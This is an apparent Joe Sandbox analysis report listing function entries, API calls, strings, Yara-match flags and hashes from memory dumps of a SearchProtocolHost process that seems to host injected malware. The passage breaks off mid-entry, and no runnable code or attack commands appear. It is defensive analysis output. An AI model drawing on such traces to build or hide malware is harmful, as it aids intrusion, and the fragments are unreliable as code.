                                                                                                                                                                                  Function 00B62C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 391fafb444e4be79360ec6c550b054d4cdebecd8f5d2d071dc5a13db30cf6057
                                                                                                                                                                                  • Instruction ID: 45b3f7b8f9c5ef9560899b56d03687ca5fa4361340f6e1246ac5ca59e26314cd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 391fafb444e4be79360ec6c550b054d4cdebecd8f5d2d071dc5a13db30cf6057
                                                                                                                                                                                  • Instruction Fuzzy Hash: AE90023224148802D2107158840874A004587D0301F59C472A456465DD8A9589917121
                                                                                                                                                                                  Function 00B62C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 55dff3de7d1d06b4a5b83b9f5d1b622f9940ea1ba2a24fb2494403b8203080e4
                                                                                                                                                                                  • Instruction ID: bf597bcf8451bbe3dcc8c03f644d89d134445002f8bf6fc2a0038e6edf5e4993
                                                                                                                                                                                  • Opcode Fuzzy Hash: 55dff3de7d1d06b4a5b83b9f5d1b622f9940ea1ba2a24fb2494403b8203080e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E90023224140842D20071584408B46004587E0301F55C077A0264659D8A15C9517521
                                                                                                                                                                                  Function 00B62DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: b477608fe1b42ed54d8d8f022b5476ec35c235a1afa5fd43c80e88cd4dbf2c1f
                                                                                                                                                                                  • Instruction ID: 63ab0f7bc654aef798b96f5190d8245f209a2746e9b72af83787f69019a626c3
                                                                                                                                                                                  • Opcode Fuzzy Hash: b477608fe1b42ed54d8d8f022b5476ec35c235a1afa5fd43c80e88cd4dbf2c1f
                                                                                                                                                                                  • Instruction Fuzzy Hash: EC90023224140413D21171584508707004987D0341F95C473A056455DD9A568A52A121
                                                                                                                                                                                  Function 00B62DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 987dada823cbb8e56cfcfffd03cd7452d8530a343ab01d02dc27cb1f7ba519cc
                                                                                                                                                                                  • Instruction ID: ea8fa1a69ac976557b2c739e0607dfc9c141a5e83ee6cb2aec0f6faf327688a8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 987dada823cbb8e56cfcfffd03cd7452d8530a343ab01d02dc27cb1f7ba519cc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 99900222282441525645B1584408507404697E0341795C073A1554955C89269956D621
                                                                                                                                                                                  Function 00B62D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: d1d373358aeef10c08d7e9f3422ec3493a867994bb20f6500133ce121afa8ae0
                                                                                                                                                                                  • Instruction ID: 1b4cbf5cd39dd18c27b4ba1aa83aef606274ecdeb5c92b05985309bc37cb0516
                                                                                                                                                                                  • Opcode Fuzzy Hash: d1d373358aeef10c08d7e9f3422ec3493a867994bb20f6500133ce121afa8ae0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A90022234140003D2407158541C6064045D7E1301F55D072E0554559CDD1589565222
                                                                                                                                                                                  Function 00B62D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: c978df953e7f703f29f18bb49f9e0cf787be22600f61b6e9b66182b34a160274
                                                                                                                                                                                  • Instruction ID: d95006c9309d59aff15bfac98a863d7223c95db2d66ad86b404eb9ec629fdd3d
                                                                                                                                                                                  • Opcode Fuzzy Hash: c978df953e7f703f29f18bb49f9e0cf787be22600f61b6e9b66182b34a160274
                                                                                                                                                                                  • Instruction Fuzzy Hash: DD90022A25340002D2807158540C60A004587D1302F95D476A015555DCCD1589695321
                                                                                                                                                                                  Function 00B62E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 62f5aae049e65f59bec71ef2c99a25a2fb0dfb2206335f41fb21f70471aaa287
                                                                                                                                                                                  • Instruction ID: d38be7247a6dae9c27be774f988f4360edcd9634e4e9b6637af0f13fc824a7db
                                                                                                                                                                                  • Opcode Fuzzy Hash: 62f5aae049e65f59bec71ef2c99a25a2fb0dfb2206335f41fb21f70471aaa287
                                                                                                                                                                                  • Instruction Fuzzy Hash: EF90022264140502D20171584408616004A87D0341F95C073A116455AECE258A92A131
                                                                                                                                                                                  Function 00B62EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: e867bba015b6e993669becc5a08f847c930ada9f00e5381ef36f7db0197d69f9
                                                                                                                                                                                  • Instruction ID: a18c23252576d84109603419ab0caa00052cdee88356d2d428c1e11d91d5f664
                                                                                                                                                                                  • Opcode Fuzzy Hash: e867bba015b6e993669becc5a08f847c930ada9f00e5381ef36f7db0197d69f9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9090026224180403D24075584808607004587D0302F55C072A21A455AE8E298D516135
                                                                                                                                                                                  Function 00B62FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 0fbc2e67445769d13c56c0f68843404f997c552363bfca4a4cced609fe87b331
                                                                                                                                                                                  • Instruction ID: 5b0ddba3c17e431c78978a9a0d4c5cf1f9e4a1eba7aad29c45938cc1639e3ac2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fbc2e67445769d13c56c0f68843404f997c552363bfca4a4cced609fe87b331
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6900222641400424240716888489064045ABE1311755C172A0AD8555D895989655665
                                                                                                                                                                                  Function 00B62FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 595e3a9fb7020ee616643e9cc66556446de5d6442c03f81cf9a56ccb63ca4876
                                                                                                                                                                                  • Instruction ID: 178674a37ac824190ef23223f91b8bbbb0dac44acfc579ab6239d58248a8994a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 595e3a9fb7020ee616643e9cc66556446de5d6442c03f81cf9a56ccb63ca4876
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D900222251C0042D30075684C18B07004587D0303F55C176A0294559CCD1589615521
                                                                                                                                                                                  Function 00B62F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 0fc64f27b308270dcb92faf24d09c3d52f0d5e3c6cd534b026fcb7e703c632cb
                                                                                                                                                                                  • Instruction ID: 65ce9854cbf19a8b36b67ed6c26aa08a8a4dcc8729637972bc7936a31f67a052
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fc64f27b308270dcb92faf24d09c3d52f0d5e3c6cd534b026fcb7e703c632cb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D90026238140442D20071584418B060045C7E1301F55C076E11A4559D8A19CD526126
                                                                                                                                                                                  Function 00B635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 99100f395709911747f94c4ae78bd708bc23904ece02c33c286509ce80867451
                                                                                                                                                                                  • Instruction ID: 5132e43d61f4243e76157738946c83ce077cb2d47ba20b40dbcb180d95ef9844
                                                                                                                                                                                  • Opcode Fuzzy Hash: 99100f395709911747f94c4ae78bd708bc23904ece02c33c286509ce80867451
                                                                                                                                                                                  • Instruction Fuzzy Hash: E990023264550402D20071584518706104587D0301F65C472A056456DD8B958A5165A2
                                                                                                                                                                                  Function 00B639B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: fb1784ca728e378cfdb8346d9b89daee8020baa964f0ebf8f838f86ae206fbdb
                                                                                                                                                                                  • Instruction ID: 4ac2ebd4e22dc743eefd00ff37ad0af905ddffea41e51fe527c848104a0c4f2d
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb1784ca728e378cfdb8346d9b89daee8020baa964f0ebf8f838f86ae206fbdb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D90022228545102D250715C44086164045A7E0301F55C072A0954599D895589556221
                                                                                                                                                                                  Function 00121098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 520 121098-12110e call 13b810 call 13c220 call 124820 call 1113f0 call 131e20 531 121130-121135 520->531 532 121110-121121 PostThreadMessageW 520->532 532->531 533 121123-12112d 532->533 533->531
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 0012111D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                                                                                                                  • API String ID: 1836367815-922563818
                                                                                                                                                                                  • Opcode ID: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                                                                                                                                                  • Instruction ID: 4cbc43905c08e4c9186aa54849c594b6bc4ec3e052083f810c782cbdae578ca0
                                                                                                                                                                                  • Opcode Fuzzy Hash: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                                                                                                                                                  • Instruction Fuzzy Hash: FB11C431D4025876EB21ABE49C42FEFBB7C9F51790F148054FA047B281D77866068BE6
                                                                                                                                                                                  Function 001210A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 534 1210a0-1210b0 535 1210b9-12110e call 13c220 call 124820 call 1113f0 call 131e20 534->535 536 1210b4 call 13b810 534->536 545 121130-121135 535->545 546 121110-121121 PostThreadMessageW 535->546 536->535 546->545 547 121123-12112d 546->547 547->545
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 0012111D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                                                                                                                  • API String ID: 1836367815-922563818
                                                                                                                                                                                  • Opcode ID: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                                                                                                                                                  • Instruction ID: ee55c3209f17e29ac3d23741f5fca25bc1a7548dd9faa42b6d61a2f1d9c9bb58
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E019671D4121876EB21E7A49C02FDFBB7C9F51B50F048054FB047B181E7746A068BE6
                                                                                                                                                                                  Function 00133C40 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 00133D1B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                                                                                  • Opcode ID: bd11e206bd162b61418908fde7cc6af85e48e0b7f9bbc4e4d4f4751761957dee
                                                                                                                                                                                  • Instruction ID: beacb0153c194c20f9aca01915fd277f9db4ca1c7f0746803b07a0f23cad274e
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd11e206bd162b61418908fde7cc6af85e48e0b7f9bbc4e4d4f4751761957dee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A3181B1A00605BBD714EFA4CC81FEBBBB9EB88710F50851DF61DAB241D7746640CBA5
                                                                                                                                                                                  Function 0012F72A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                                  • String ID: @J7<
                                                                                                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                                                                                                  • Opcode ID: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                                                                                                                                                  • Instruction ID: 8364e3340d24f551589a3574e965fe41c0aa8634410d3f16f5b8468493dd43e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                                                                                                                                                  • Instruction Fuzzy Hash: F33121B5A006199FDB10DFD8D8809EFB7B9BF88304F108569E605EB214D775EE058BA0
                                                                                                                                                                                  Function 0012F730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                                  • String ID: @J7<
                                                                                                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                                                                                                  • Opcode ID: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                                                                                                                                                  • Instruction ID: 56e8e81a4d954e788ee508a0ed2f629ba9d04076c169b98119638730aa77a3c9
                                                                                                                                                                                  • Opcode Fuzzy Hash: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B3130B5A0020A9FDB00DFD8D8809EFB7B9FF88304F108569E605EB214D775EE058BA0
                                                                                                                                                                                  Function 001248DC Relevance: 1.6, APIs: 1, Instructions: 91libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00124892
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 38580999aaf99117114d273f89efd2578bdd12a5eeeabbc80364d0ff1e678916
                                                                                                                                                                                  • Instruction ID: 7685b4507cddb4b16d93738141c402863f98cac5fb8a05d6cbb759bc821870f1
